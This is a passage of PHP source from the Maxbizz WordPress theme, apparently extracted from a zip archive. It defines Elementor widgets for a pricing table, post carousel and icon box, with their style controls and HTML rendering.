					'label_link!' => '',
				],
			]
		);
		$this->end_controls_tab();

		$this->end_controls_tabs();

		$this->end_controls_section();

	}

	protected function render() {

		$settings = $this->get_settings_for_display();

		if ( ! empty( $settings['link']['url'] ) ) {
			$this->add_render_attribute( 'button', 'href', $settings['link']['url'] );

			if ( $settings['link']['is_external'] ) {
				$this->add_render_attribute( 'button', 'target', '_blank' );
			}

			if ( $settings['link']['nofollow'] ) {
				$this->add_render_attribute( 'button', 'rel', 'nofollow' );
			}
		}
		$this->add_render_attribute( 'button', 'class', 'octf-btn octf-btn-border' );

		?>

		<div class="ot-pricing-table <?php if( $settings['is_featured'] ) echo 'is-featured' ?>">
			<div class="layer-behind"></div>
			<div class="inner-table">
				<?php if( $settings['title'] ){ echo '<h6 class="title-table"><span>' .esc_html( $settings['title'] ). '</span></h6>'; } ?>
				<?php if( $settings['price'] ){ echo '<h2>' .$settings['price']. '</h2>'; } ?>
				<?php if( $settings['price_for'] ){ echo '<p>'. esc_html( $settings['price_for'] ). '</p>'; } ?>
				<?php if( $settings['short_text'] ){ echo '<div class="short-text">'. $settings['short_text']. '</div>'; } ?>
				<div class="details <?php if( !$settings['icon_list'] ) echo 'no-icon'; ?>"><?php echo $settings['details']; ?></div>
				<?php if( $settings['label_link'] ){ echo '<a ' .$this->get_render_attribute_string( 'button' ). '>' .$settings['label_link']. '</a>'; } ?>
			</div>
		</div>

		<?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Pricing_Table class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Pricing_Table() );PK�8FZE_�:E:E/inc/backend/elementor/widgets/post-carousel.phpnu�[���<?php 
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Post Carousel
 */
class Maxbizz_Post_Carousel extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'ipostcarousel';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Post Carousel', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-posts-carousel';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Posts', 'maxbizz' ),
			]
		);
		$this->add_control(
			'post_cat',
			[
				'label' => __( 'Select Categories', 'maxbizz' ),
				'type' => Controls_Manager::SELECT2,
				'options' => $this->select_param_cate_post(),
				'multiple' => true,
				'label_block' => true,
				'placeholder' => __( 'All Categories', 'maxbizz' ),
			]
		);
		$this->add_control(
			'post_num',
			[
				'label' => __( 'Show Number Posts', 'maxbizz' ),
				'type' => Controls_Manager::NUMBER,
				'default' => '6',
			]
		);	
		$this->add_control(
			'exc',
			[
				'label' => esc_html__( 'Excerpt Length', 'theratio' ),
				'type' => Controls_Manager::NUMBER,
				'default' => '0',
			]
		);
		$this->add_control(
			'post_thumbnail',
			[
				'label' => __( 'Thumbnail Image Size', 'onum' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'maxbizz-post-thumbnail-grid',
				'options' => [
					'maxbizz-post-thumbnail-grid' => __( 'Default', 'onum' ),
					'full' => __( 'Full', 'onum' ),
				],
			]
		);
		$this->add_control(
			'heading_slider',
			[
				'label' => __( 'Slider', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$slides_show = range( 1, 4 );
		$slides_show = array_combine( $slides_show, $slides_show );

		$this->add_responsive_control(
			'tshow',
			[
				'label' => __( 'Slides to Show', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'' => __( 'Default', 'maxbizz' ),
				] + $slides_show,
				'default' => ''
			]
		);
		$this->add_control(
			'loop',
			[
				'label' => __( 'Loop', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'autoplay',
			[
				'label' => __( 'Autoplay', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true' => __( 'Yes', 'maxbizz' ),
					'false' => __( 'No', 'maxbizz' ),
				]
			]
		);
		$this->add_control(
			'timeout',
			[
				'label' => __( 'Autoplay Timeout', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min'  => 1000,
						'max'  => 20000,
						'step' => 1000,
					],
				],
				'default' => [
					'size' => 7000,
				],
				'condition' => [
					'autoplay' => 'true',
				]
			]
		);
		$this->add_control(
			'arrows',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'false',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);
		$this->add_control(
			'dots',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);
		$this->add_responsive_control(
			'w_gaps',
			[
				'label' => __( 'Gap Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
			]
		);
		$this->end_controls_section();

		$this->start_controls_section(
			'posts_style',
			[
				'label' => __( 'Post Items', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'heading_general',
			[
				'label' => __( 'General', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'radius_box',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .post-inner' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'item_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .post-inner' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'box_box_shadow',
				'selector' => '{{WRAPPER}} .post-inner',
			]
		);

		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'title_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .post-box h5' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .post-box h5 a' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'title_hcolor',
			[
				'label' => __( 'Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .post-box h5 a:hover' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .post-box h5 a',
			]
		);

		/* excerpt */
		$this->add_control(
			'heading_excerpt',
			[
				'label' => __( 'Excerpt', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'excerpt_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .post-box .the-excerpt' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'excerpt_typography',
				'selector' => '{{WRAPPER}} .post-box .the-excerpt',
			]
		);

		/* category */
		$this->add_control(
			'heading_cat',
			[
				'label' => __( 'Category', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'show_cat',
			[
				'label' => __( 'Show Category', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Show', 'maxbizz' ),
				'label_off' => __( 'Hide', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
			]
		);
		$this->add_control(
			'cat_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .post-box .post-cat a' => 'color: {{VALUE}};',
				],
				'condition' => [
					'show_cat' => 'yes',
				]
			]
		);
		$this->add_control(
			'cat_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .post-box .post-cat a' => 'background: {{VALUE}};',
				],
				'condition' => [
					'show_cat' => 'yes',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'cat_typography',
				'selector' => '{{WRAPPER}} .post-box .post-cat a',
				'condition' => [
					'show_cat' => 'yes',
				]
			]
		);

		/* meta */
		$this->add_control(
			'heading_meta',
			[
				'label' => __( 'Meta', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'meta_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .post-box .entry-meta, {{WRAPPER}} .post-box .entry-meta a' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'meta_hover_color',
			[
				'label' => __( 'Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .post-box .entry-meta a:hover' => 'color: {{VALUE}};',
					'{{WRAPPER}} .post-box .btn-details:hover' => 'border-color: {{VALUE}}; background: transparent;',
				],
			]
		);
		$this->add_control(
			'meta_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .post-box .entry-meta' => 'background: {{VALUE}}; border-color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'meta_typography',
				'selector' => '{{WRAPPER}} .post-box .entry-meta',
				
			]
		);
		$this->end_controls_section();	

		// Dots.
		$this->start_controls_section(
			'navigation_section',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'dots' => 'true',
				],
			]
		);

		$this->add_responsive_control(
			'dots_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-dots' => 'bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
            'dots_bgcolor',
            [
                'label' => __( 'Color', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->add_control(
            'dots_active_bgcolor',
            [
                'label' => __( 'Color Active', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot.active span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->end_controls_section();

        // Arrow.
		$this->start_controls_section(
			'style_nav',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'arrows' => 'true',
				],
			]
		);
		$this->add_responsive_control(
			'arrow_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav .owl-prev' => 'left: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .owl-nav .owl-next' => 'right: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_responsive_control(
			'arrow_width',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 30,
						'max' => 70,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'arrow_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'color: {{VALUE}};',
				]
			]
		);
		
		$this->add_control(
			'arrow_bg_color',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_hcolor',
			[
				'label' => __( 'Color Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_bg_hcolor',
			[
				'label' => __( 'Background Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'radius_arrow',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>

		<div class="post-slider" data-loop="<?php echo $settings['loop']; ?>" data-auto="<?php echo $settings['autoplay']; ?>" data-time="<?php echo $settings['timeout']['size']; ?>" data-arrows="<?php echo $settings['arrows']; ?>" data-dots="<?php echo $settings['dots']; ?>" data-show="<?php echo $settings['tshow']; ?>" data-tshow="<?php echo esc_attr( $settings['tshow_tablet'] ); ?>" data-mshow="<?php echo esc_attr( $settings['tshow_mobile'] ); ?>" data-gaps="<?php echo esc_attr( $settings['w_gaps']['size'] ); ?>" data-tgaps="<?php echo esc_attr( $settings['w_gaps_tablet']['size'] ); ?>" data-mgaps="<?php echo $settings['w_gaps_mobile']['size']; ?>">
			<div class="owl-carousel owl-theme">
	        <?php
	        	$number_show = (!empty($settings['post_num']) ? $settings['post_num'] : 9);

	        	if( $settings['post_cat'] ){
	                $args = array(
			            'post_type' => 'post',
			            'post_status' => 'publish',
			            'posts_per_page' => $number_show,
			            'tax_query' => array(
					        array(
					            'taxonomy' => 'category',
					            'field'    => 'slug',
					            'terms'    => $settings['post_cat']
					        ),
					    ),
			        );
	            }else{
	                $args = array(
	                    'post_type' => 'post',
			            'post_status' => 'publish',
			            'posts_per_page' => $number_show,
	                );
	            }

		        $blogpost = new \WP_Query($args);
				if($blogpost->have_posts()) : while($blogpost->have_posts()) : $blogpost->the_post(); ?> 
				
					<article id="post-<?php the_ID(); ?>" <?php post_class('post-box'); ?>>
						<div class="post-inner">

							<?php if ( has_post_thumbnail() ) { ?>
								<div class="entry-media">
									<?php if( $settings['show_cat'] ) { maxbizz_posted_in(); } ?>
									<a href="<?php the_permalink(); ?>">
										<?php the_post_thumbnail($settings['post_thumbnail']); ?>
									</a>
								</div>
							<?php } ?>

							<div class="inner-post">
								<?php if( !has_post_thumbnail() && $settings['show_cat'] ) maxbizz_posted_in(); ?>
								<div class="entry-header">

									<?php the_title( '<h5 class="entry-title"><a class="title-link" href="' . esc_url( get_permalink() ) . '" rel="bookmark">', '</a></h5>' ); ?>

								</div>

								<?php if( $settings['exc'] ) { echo '<div class="entry-summary the-excerpt">' .maxbizz_excerpt($settings['exc']). '...</div>'; } ?>
							</div>
							<div class="entry-meta">
								<?php if( maxbizz_get_option( 'post_entry_meta' ) ) { maxbizz_post_meta(); } ?>
								<a href="<?php the_permalink(); ?>" class="btn-details"><i class="ot-flaticon-trajectory"></i></a>
							</div>

						</div>
					</article>

		        <?php endwhile; wp_reset_postdata(); endif; ?>
		    </div>
	    </div>
		<?php
	}

	protected function _content_template() {}

	protected function select_param_cate_post() {
		$args = array( 'orderby=name&order=ASC&hide_empty=0' );
		$terms = get_terms( 'category', $args );
		$cat = array();
		if ( ! empty( $terms ) && ! is_wp_error( $terms ) ){		    
		    foreach ( $terms as $term ) {
		        $cat[$term->slug] = $term->name;
		    }
		}
	  	return $cat;
	}
}
// After the Maxbizz_Post_Carousel class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Post_Carousel() );PK�8FZjA_8�;�;,inc/backend/elementor/widgets/icon-box-2.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Icon Box 2
 */
class Maxbizz_IconBox2 extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iiconbox2';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Icon Box 2', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-icon-box';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content Service box
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Icon Box', 'maxbizz' ),
			]
		);
		$this->add_control(
			'box_style',
			[
				'label' => __( 'Box Style', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 's1',
				'options' => [
					's1'   => __( 'Style 1', 'maxbizz' ),
					's2'   => __( 'Style 2', 'maxbizz' ),
				],
				'prefix_class' => 'box-',
			]
		);
		$this->add_responsive_control(
			'icon_pos',
			[
				'label' => __( 'Icon Position', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'default' => 'left',
				'options' => [
					'left' => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-h-align-left',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-h-align-right',
					],
				],
				'prefix_class' => 'icon-',
				'toggle' => false,
			]
		);
		$this->add_control(
			'icon_font',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'type' => Controls_Manager::ICONS,
				'fa4compatibility' => 'icon',
				'default' => [
					'value' => 'fas fa-star',
					'library' => 'fa-solid',
				],
			]
		);

		$this->add_control(
			'title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Design & Planning', 'maxbizz' ),
			]
		);
		$this->add_control(
			'header_size',
			[
				'label' => __( 'Title HTML Tag', 'elementor' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'h1' => 'H1',
					'h2' => 'H2',
					'h3' => 'H3',
					'h4' => 'H4',
					'h5' => 'H5',
					'h6' => 'H6',
					'div' => 'div',
					'span' => 'span',
					'p' => 'p',
				],
				'default' => 'h5',
			]
		);

		$this->add_control(
			'des',
			[
				'label' => 'Description',
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'We will help you to get the result you dreamed of.', 'maxbizz' ),
			]
		);

		$this->add_control(
			'link',
			[
				'label' => __( 'Link', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://your-link.com', 'maxbizz' ),
				'default'	=> [
					'url'	=> '#'
				],
			]
		);

		$this->end_controls_section();

		//Style

		$this->start_controls_section(
			'style_box_section',
			[
				'label' => __( 'General', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);		

		$this->add_control(
			'is_line',
			[
				'label'   => esc_html__( 'Bottom Line', 'maxbizz' ),
				'type'    => Controls_Manager::SWITCHER,
				'prefix_class' => 'bline-',
				'default' => 'no',
				'condition' => [
					'box_style'	=> 's1'
				]
			]
		);
		$this->add_control(
			'line_color',
			[
				'label' => __( 'Line Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box .content-box' => 'border-color: {{VALUE}};',
				],
				'condition' => [
					'is_line'	=> 'yes',
					'box_style'	=> 's1'
				]
			]
		);
		$this->add_control(
			'hiver_line_color',
			[
				'label' => __( 'Hover Line Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box .content-box:after' => 'background: {{VALUE}};',
				],
				'condition' => [
					'is_line'	=> 'yes',
					'box_style'	=> 's1'
				]
			]
		);

		$this->add_control(
			'hover_animation',
			[
				'label' => __( 'Hover Animation', 'maxbizz' ),
				'type' => Controls_Manager::HOVER_ANIMATION,
				'prefix_class' => 'elementor-animation-',
			]
		);

		$this->start_controls_tabs( 'tabs_box_style' );
		$this->start_controls_tab(
			'tab_bg_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
			]
		);

		$this->add_control(
			'icon_color',
			[
				'label' => __( 'Icon Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-main i' => 'color: {{VALUE}};',
					'{{WRAPPER}} .icon-main svg' => 'fill: {{VALUE}};'
				],
			]
		);
		$this->add_control(
			'icon_bg',
			[
				'label' => __( 'Background Icon', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-main' => 'background: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'title_color',
			[
				'label' => __( 'Title Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box .title-box, {{WRAPPER}} .icon-box .title-box a' => 'color: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'des_color',
			[
				'label' => __( 'Description Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box p' => 'color: {{VALUE}};',
				],
				'condition' => [
					'des!' => ''
				]
			]
		);

		$this->add_control(
			'bg_box',
			[
				'label' => __( 'Background Box', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .content-box' => 'background: {{VALUE}};',
				],
				'condition' => [
					'box_style'	=> 's2'
				]
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'box_box_shadow',
				'selector' => '{{WRAPPER}} .content-box',
				'condition' => [
					'box_style'	=> 's2'
				]
			]
		);

		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_bg_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
			]
		);
		$this->add_control(
			'bg_hover_icon_color',
			[
				'label' => __( 'Icon Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:hover .icon-main' => 'color: {{VALUE}};',
					'{{WRAPPER}} .icon-box:hover svg' => 'fill: {{VALUE}};'
				],
			]
		);
		$this->add_control(
			'bg_hover_icon_bg',
			[
				'label' => __( 'Background Icon', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:hover .icon-main' => 'background: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'title_hover_color',
			[
				'label' => __( 'Title Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:hover .title-box, {{WRAPPER}} .icon-box:hover .title-box a' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'des_hcolor',
			[
				'label' => __( 'Description Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:hover p' => 'color: {{VALUE}};',
				],
				'condition' => [
					'des!' => ''
				]
			]
		);
		$this->add_control(
			'bg_hover_box',
			[
				'label' => __( 'Background Box', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:hover .content-box' => 'background: {{VALUE}};',
				],
				'condition' => [
					'box_style'	=> 's2'
				]
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'hover_box_shadow',
				'selector' => '{{WRAPPER}} .icon-box:hover .content-box',
				'condition' => [
					'box_style'	=> 's2'
				]
			]
		);

		$this->end_controls_tab();
		$this->end_controls_tabs();
		$this->end_controls_section();
		
		$this->start_controls_section(
			'style_icon_section',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_responsive_control(
			'icon_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}}.icon-left .content-box' => 'margin-left: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}}.icon-right .content-box' => 'margin-right: {{SIZE}}{{UNIT}};',
				],
				'condition' => [
					'box_style'	=> 's1'
				]
			]
		);
		$this->add_responsive_control(
			'icon_size',
			[
				'label' => __( 'Size', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .icon-main i' => 'font-size: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .icon-main svg' => 'width: {{SIZE}}{{UNIT}};'
				],
			]
		);
		$this->add_responsive_control(
			'icon_bg_width',
			[
				'label' => __( 'Background Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .icon-main' => 'width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}}; line-height: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .icon-main i' => 'line-height: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}}.box-s2.icon-left .icon-box' => 'padding-left: calc({{SIZE}}{{UNIT}}/2);',
					'{{WRAPPER}}.box-s2.icon-right .icon-box' => 'padding-right: calc({{SIZE}}{{UNIT}}/2);',
				],
			]
		);
		$this->add_control(
			'radius_box',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .icon-main' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'icon_shadow',
				'selector' => '{{WRAPPER}} .icon-main',
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_responsive_control(
			'content_padding',
			[
				'label' => 'Padding Content',
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}}.box-s2 .content-box, {{WRAPPER}}.box-s1 .icon-box' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		//Title
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
		);
		$this->add_responsive_control(
			'title_space_top',
			[
				'label' => __( 'Top Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .icon-box .title-box' => 'padding-top: {{SIZE}}{{UNIT}};',
				],
				'condition' => [
					'box_style'	=> 's1'
				]
			]
		);
		$this->add_responsive_control(
			'title_space_bottom',
			[
				'label' => __( 'Bottom Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
